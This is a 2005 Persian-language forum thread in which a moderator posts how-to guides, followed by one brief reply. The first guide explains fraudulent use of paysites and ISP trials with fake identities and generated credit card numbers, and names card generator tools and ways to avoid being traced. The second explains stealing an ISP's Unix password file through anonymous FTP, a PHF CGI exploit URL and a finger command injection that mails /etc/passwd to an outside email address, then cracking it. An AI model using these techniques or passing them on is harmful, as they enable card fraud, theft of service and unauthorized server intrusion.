ParsX.com
پذیرش پروژه از دانشجویی ... تا سازمانی 09376225339
 
   ProfileProfile   Log in to check your private messagesLog in to check your private messages  |  FAQFAQ   SearchSearch   MemberlistMemberlist   UsergroupsUsergroups Log inLog in   RegisterRegister 

استفاده رايگان و دانلود مفتي , هک سرور خودتون

 
Post new topic   Reply to topic    ParsX.com Forum Index -> اخبار و مباحث عمومي
View previous topic :: View next topic  
Author Message
arash
مدير بخش سي
مدير بخش سي


Joined: 27 Nov 2004
Posts: 1232
Location: www.parsx.com

PostPosted: Fri May 06, 2005 9:33 pm    Post subject: استفاده رايگان و دانلود مفتي , هک سرور خودتون Reply with quote

درس امروز از روشهای مهم هک هستش ولی با گسترش روز افزون تکنولوژی و ... این روش تقريبا از کار افتاده به حساب ميايد ولی به هر حال شروع خوبي برای ياد گرفتن مفاهيم اوليه است .... مطمئن باشيد که اين بحث را ادامه خواهم داد ...

Phreaken چيست؟
معني دقيق کلمه Phreaken را ميشود در يک جمله خلاصه کرد : رجيستر شدن و استفاده کردن از Paysite ها با اطلاعات غلط. يا به طور مستقيم : استفاده کردن مجاني از همه چيز !
مسلما انجام دادن همچين کاري ممنوع است ولي اطلاعات زير به وب مسترها (هم) کمک خواهد کردکه چگونه جلوي همچين کارهايي را بگيرند.!
در اينجا ما مستقيم سراغ بهترين روش استفاده ار همچين سايتهايي ميرويم:

استفاده کردن با کارتهاي اعتباري! :
در همچين مواردي کاربر به صورت آنلاين شماره و مشخصات کارت اعتباري را وارد ميکند و سپس کد و رمز هاي مربوطه را براي استفاده کردن از سايت در يافت ميکند.
هکرهاي کارکشته در اينگونه موارد از پاکتهاي گمنام اينترنتي استفاده ميکنند که در راس همه بسته ( تست اينترنت با AOL) قرار دارد که در اکثر مجله هاي کامپيوتر در اروپا به طور رايگان عرضه ميشود. در اين بسته شرکت AOL 2 ماه استفاده مجاني از اينتر نت را عرضه ميکند .
تنها کاري که بايد بکنيم:
1- وارد کردن اسم و مشخصات خيالي
2- وارد کردن اسم يکي از بانکهاي معروف اروپا
3- وارد کردن يک عدد دلخواه ضربدر 4 به عنوان شماره حساب!
4 - و دقيقا 2 ثانيه بعد استفاده رايگان به مدت 2 ماه از اينترنت.
مشکلي که در اين موارد ممکن است پيش آيد تست صحت وجود داشتن شماره حساب به وسيله AOL است. که پيدا کردن يک شماره حساب بانک در اينترنت و يا در روزنامه نبايد مشکلي براي ما ايجاد کند.
در اينجا بايد بغير از AOL يادي هم ازشرکت OKEY.NET کنيم که امکانات فوق را دارد!
مشکل بعدي انتخاب Paysite و بدست آوردن شماره کارت اعتباري است. که اينکار کمي مشکل تر ولي مسلما غير ممکن نخواهد بود.
معمولترين روش بدست آوردن آن استفاده از Credit Card-Generatorها است. مانند :
Wizrd Credit و يا Cardpro و يا Creditmaster
و جستجو کردن عبارت:
Credit Card-Generator
و برنامه هايي كه در بالا نام بردم
بتوانيد به اين برنامه ها دسترسي پيدا کنيد و يا از طرق ديگر حتما اين برنامه را تهيه كنيد .
البته در اين جستجوگر ( چون مخصوص جستجوي برنامه هاي هك است ) شايد شما هم مثل من به جاهايي بربخوريد كه كرديت كارت مجاني ميدهند .... البته اين شركت ها از شما توقعي ندارند و يك كرديت كارت قلابي و مجاني به شما ميدهند كه تا 40 % مواقع شما را ياري خوا هد كرد و شما براي 60% مواقع ديگر از روش Credit Card-Generator استفاده كنيد
چيزي که بايد دانست: هيچ وقت نميشود آلاين امتحان کرد که آيا همچين شماره کارتي وجود خارجي دارد يا به چه کسي تعلق دارد. بنابراين شماره اي که از Credit Card-Generator ها ميگيريم را به راحتي استفاده ميکنيم ولي Credit Card-Generator ها تاريخ اعتبار کارت را نميگويند براي بدست آوردن آن چه بايد کرد؟
در اکثر برنامه هاي Credit Card-Generator از يک شماره کارت اعتباري واقعي شماره هاي شبيه سازي شده بدست مي آيد. اين کار در اينترنت تحت اصطلاح Extrapolation شناخته ميشود.شماره هاي جعلي اکثرا در رقمهاي آخري با شماره اصلي و معتبر کارت فرق دارند.
شايد تعجب کنيد اگر بشنويد : وقتي مثلا شماره کارت اعتباري خود را به Credit Card-Generatorها ميدهيد و يک شماره جعلي از آن Extrapolation ميکنيد ميتوانيد از تاريخ اعتبار کارت خود استفاده کنيد! اين کار 99% با موفقيت همراه است.
واقعا هم هيچ جاي ترسي نيست که کسي ردپاي شما را دنبال کند چون کساني که با بسته هاي گمنام AOL و ...در اينترنت هستند با بالاترين درصد گمنام بودن از اينترنت استفاده ميکنند.
براي اطمينان بيشتر از گمنام ماندن ميتوانيد سري به:
www.anonymizer.com
بزنيد شايد در آنجا بتوانيد مثلا برنامه اي پيدا کنيد که آدرس آي پي شما را مخفي کند يا غير قابل تعقيب!!
در اينجا يك نكته را بگويم كه اين كار حرام و خلاف اصول انسانيست و اگر شما مثل من موفق شديد كه از اين كارتها استفاده كنيد اين را در نظر داشته باشيد كه هيچ گاه در جهت ضرر زدن به ديگران نباشد ... مثلا من يك پيشنهاد ميكنم ... شما ميتوانيد از آنها براي خريد نرم افزار ها ي tril ( آزمايشي ) كه مدت زمان آن ها در حال پايان يافتن است و يا خريد پوستر ها و ... استفاده كنيد ...
ولي توجه داشته باشيد : اگر از يکي از روشهاي بالا استفاده نمي کنيد دست به همچين کاري نزنيد چون در غير اين صورت مدير سايتي که شما در آن از شماره جعلي کارت اعتباري وارد ميکنيد آدرس آي پي شما را که در سرور سايت پروتکل ميشود بدست آورده . و يک تماس با پرووايدر اينترت شما و دادن آدرس آي پي شما به پرووايدر کافي است تا پرووايدر با يک گزارش i.d.R. به پليس و اثبات اينکه شما با اين آدرس آي پي آنلاين بوديد شما را به جرم جعل کارت اعتباري روانه زندان کند.


موفق باشيد !


Last edited by arash on Sat May 07, 2005 5:52 am; edited 1 time in total
Back to top
arash
مدير بخش سي
مدير بخش سي


Joined: 27 Nov 2004
Posts: 1232
Location: www.parsx.com

PostPosted: Fri May 06, 2005 9:37 pm    Post subject: يك كارت اينترنت مجاني Reply with quote

يك كارت اينترنت مجاني


چند روزي بود فكر استفاده از يك كارت اينترنت مجاني داشت ديوونم ميكرد... البته بگم ها ما حروم خور هم نيستيم ... آخه بابا به پير به پيغمبر نامرديه كه ما اين همه پول كارت هاي آبكي اينترنت رو ميديم ... يكمي هم كيف دنيا رو كنيم ..... اينه
در ضمن هر کی اکانت می خواد می تونه به من به گه !
Unixيكي از سرورهايي است كه در جهان بسيار از آن استفاده مي شود در ايران و دربيشتر شهر هاي بزرگ هم ISPهايي وجود دارند كه سرور آن ها Unixباشند .بنابر اين شما مي توانيد براي هك آن ها از اين راه ها استفاده كنيد شما در اين راه احتمالا با مشكلات زيادي برخورد خواهيد كرد .من راه كامل و بي عيبي را در اختيار شما نمي گذارم براي نفوذ گر شدن بايد تلاش بسياري كرد و اين اشاره اي است كه شما را به طرف راه درست هدايت مي كند .براي هك يونيكس از اين طريق عمل مي كنند كه با روش هايي كه ذكر خواهد شد فايل حاوي Passwordها و IDها را كه به نام Passwdمي باشد دريافت كنند .اين فايل يك فايل متني است كه در آن اطلاعات بصورت رمز در آمده .وقتي شما يك فايل Passwdرا باز كنيد چنين نوشته هايي را
مي بينيد .كه بايد آن را از حالت رمز در آورد .
root:2fkbNba29uWys:0:1:Operator:/:/bin/csh
admin:rYsKMjnvRppro:100:11:WWW administrator:/home/Common/WWW:/bin/csh
Taha:3A62i9qr:1012:10:Mashhad

در اينجا مثلا Tahaنام IDو 3a62...كلمه عبور اما به صورت رمز در آمده مي باشد .
شايد فايل به شكل زير هم باشد .اما اين فايل كار را غيرممكن مي سازد.در صورتي كه به شكل زير باشد يعني در آن علامت *به جاي كلمه ي به رمز آمده به آن ها Shadowedگفته مي شود .
root:*:0:1:Operator:/:/bin/csh
admin:*:100:11:WWW administrator:/home/Common/WWW:/bin/csh
Taha:*:1012:10:mashhad BFH:/home/user/Taha:/usr/local/bin/tcsh
ما فعلا مي خواهيم اين فايل را دريافت كنيم .اولين قدم اين است كه آيدي در آن ISPبراي خود دست و پا كنيم .حالا اين آيدي مي تواند متعلق به دوستمان باشد و يا يك آشناي دور .پيدا كردن رمز دوست شما به سادگي ميسر است كه در حوصله اين مقاله نمي گنجد .بعد از پيدا كردن رمز شما با آيدي دوستتان به شبكه Connectشويد .اين اتصال مي تواند يك اتصال به طريق Modem DialUp Connectionباشد .بعد از اتصال كامل وارد قسمت MS-DOS Promptشويد و فرمان زير را وارد كنيد
FTP http://www.domain.com/
كه Domainآدرس سرور ISPمي باشد سپس از شما خواسته مي شود تا آيدي خود را وارد كنيد كلمه ي Anonymousرا بزنيد .سپس وقتي درخواست كلمه عبور شد كليد Enterرا بزنيد .اگر وارد سيستم شديد موفق شده ايد در غير اين صورت جمله ي login failedدريافت مي شود .دوباره امتحان كنيد و اين بار در كادر Passwordآدرس Emailاي را وارد كنيد .اگر اين بار هم جواب نداد به جاي كلمه ي anonymousاز Userخود يعني دوستتان استفاده كنيد . احتمال دارد اين بار هم موفق نشويد .اين دفعه روش هاي فوق را براي دستور زير امتحان كنيد
FTP ftp.domain.com
اگر اين بار هم جوابي نگرفتيد با ISPتماس گرفته و سوال كنيد كه چگونه مي توانم از سرور FTPخود شما استفاده كنم چون وارد سيتمتان نمي شود اگر پرسيد براي چه مي خواهيد وارد شويد بگوييد مي خواهم از نرم افزار هاي آن استفاده كنم ولي مواظب باشيد كه نام خود را نگوييد .خلاصه تمام تلاش خود را براي فهميدن روش دستيابي به سيستم بكنيد اگر توانستيد وارد سيستم شويد به راحتي مي توانيد وارد شاخه ي مشخصي رفته و فايل Passwdها را بگيريد ولي احتمال دارد كه آن شاخه براي شما قفل شده باشد .براي كار با FTPبايد دستورات FTPرا ياد داشته باشيد .براي لسيت دستورات مي توانيد ?را تايپ كنيد .ابتدا به شاخه ي ETCبرويد مي توانيد فايل passwdرا در آنجا پيدا كنيد .اين فايل را بگيريد .اگر در آنجا نبود شاخه هاي ديگر را امتحان كنيد .ولي به احتمال زياد همانجاست .حال اگر اصلا نتوانستيد وارد FTPشويد مي توانيد اين فايل را با استفاده از قايلبيت PHFبگيريد .به اين صورت كه در Internet Browserخود آدرس زير را وارد كنيد .
http://www.domain.com/cgi-bin/phf?Q...t%20/etc/passwd
اگر به اين صورت هم نتوانستيد آن را بگيريد مي توانيد از طريق Fingerاين كار را انجام دهيد .اين روش به شرطي جواب مي دهد كه Serverمورد نظر قابليت Fingerرا داشته باشد .به آدرس زير مراجعه كنيد .
www.domain.com/cgi-bin/finger
اگر اين آدرس كار نكند ديگر هيچ اميدي نيست اما اگر كار كند كادري جلوي شما ظاهر مي شود كه مي خواهد نام مورد نظر خود را بدهيد .آدرس زير را وارد كنيد .
ID@domain.com ; /bin/mail you@somewhere.com < etc/passwd
كه در اين آدرس IDشناسه كاربري يك شخص است كه مثلا مي توانيد از آيدي دوستتان استفاده كنيد domain.comآدرس نام حوزه ي ISPاست و آدرس you@somewhere.comآدرس Emailشماست مثلا اين يك نمونه است .
bfh@internet.com ; /bin/mail amir6_6_6@yahoo.com < etc/passwd
با وارد كردن اين دستور فايل Passwdبراي من به آدرس 3dhack@yahoo.com پست مي شود !
خوب حالا تا الان اگر توانسته ايد فايل را گرفته باشيد كه بهتر در غير اينصورت بايد بي خيال اين روش شويد .
حالا اگر فايل shadowedگير آورديد بقيه ي متن را نخوانيد چون كمكي به شما نمي كند و بايد از روش هاي ديگري استفاده كرد .اما اگر يك فايل مثل نمونه اولي كه در بالا بود گير آورديد مي توانيد كار خود را ادامه دهيد حالا شما نياز به يك برنامه ي Unix Password Crackerداريد معروف ترين اين نوع برنامه ها John Ripperو Cracker Jackمي باشد .اما John Ripper سريعترين نوع اين برنامه مي باشد .اين دو برنامه را مي توانيد از همان آدرس قبلي يعني www.hackersclub.com/km/frontpageبه دست بياوريد اما نمونه ي ديگري از اين نمونه برنامه ها به كتابخانه هك به نام jill_v20 ارسال شد .با استفاده از اين برنامه ها مي توانيد به هدف خود برسيد . به همين راحتي .....
و روش بعد :
+در آینده ای نزدیک اگه پیشنهادها زیاد تر بشه و این بر و بچ پرشین بلاگ گیر ندن یه آموزش آماده کردم که با عکس توضیح دادم این روش 99 درصد عملی است و انجام می شه من که مشکلی نداشتم !
++ در ضمن هر هفته به یکی اکانت می دم ( راندم )
Back to top
arash
مدير بخش سي
مدير بخش سي


Joined: 27 Nov 2004
Posts: 1232
Location: www.parsx.com

PostPosted: Fri May 06, 2005 9:38 pm    Post subject: Reply with quote

راستش منبع رو هر چی کشتم پیدا نکردم چون یک صفحه save شده بود ولی آدرس تو سرسش نبود
Back to top
Iman
بابا اينكاره


Joined: 30 Nov 2004
Posts: 474
Location: Tehran

PostPosted: Sat May 07, 2005 8:59 am    Post subject: Reply with quote

اين كارهايي كه گفتي 3-4 سال پيش جواب مي داد كه كسي چيزي حاليش نبود(منظورم Admin آياس پي هاست)...اما الان ديگه همه اين پورتها و دسترسي ها رو بستن و اين كارا جواب نميده..
به هر حال ممنون كه روشو تشريح كردي براي دوستانLaughing
Back to top
Display posts from previous:   
Post new topic   Reply to topic    ParsX.com Forum Index -> اخبار و مباحث عمومي All times are GMT + 3.5 Hours
Page 1 of 1

 
Jump to:  
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum